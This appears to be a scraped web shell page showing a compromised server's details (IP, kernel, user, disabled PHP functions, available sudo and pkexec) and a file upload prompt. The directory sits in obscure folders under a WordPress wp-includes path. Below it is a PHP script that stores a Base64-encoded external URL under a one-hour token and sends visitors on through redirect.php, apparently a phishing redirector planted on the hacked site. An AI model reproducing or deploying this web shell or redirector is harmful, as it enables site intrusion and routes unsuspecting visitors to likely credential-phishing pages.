| Server IP : 64.225.102.56 / Your IP : 216.73.216.220 Web Server : Apache/2.4.68 (Ubuntu) mod_fcgid/2.3.9 OpenSSL/3.0.2 System : Linux smtp.zejefoy.com 5.15.0-185-generic #195-Ubuntu SMP Fri Jun 19 17:11:50 UTC 2026 x86_64 User : auto ( 1002) PHP Version : 7.4.33 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,exec,system,passthru,shell_exec,proc_open,popen MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/auto/web/cifisoa.com/public_html/wp-includes/rest-api/jlakdec/yiwsoqh/pr1otvw/ |
Upload File : |
<?php
session_start();
function generateToken($length = 16) {
return bin2hex(random_bytes($length));
}
$target_url = 'https://incrusersupennationntcefortnght.com/litweui/index.html';
// Encode URL in Base64
$encoded_url = base64_encode($target_url);
// Load tokens storage (JSON file)
$file = 'tokens.json';
$tokens = file_exists($file) ? json_decode(file_get_contents($file), true) : [];
// Generate a unique token
$token = generateToken();
// Store encoded URL with expiry and usage info
$tokens[$token] = [
'url' => $encoded_url,
'expires' => time() + 3600, // expires in 1 hour
'used' => false,
];
// Save tokens
file_put_contents($file, json_encode($tokens));
// Store token in session
$_SESSION['redirect_token'] = $token;
// Redirect to redirect.php
header("Location: redirect.php?token=$token");
exit();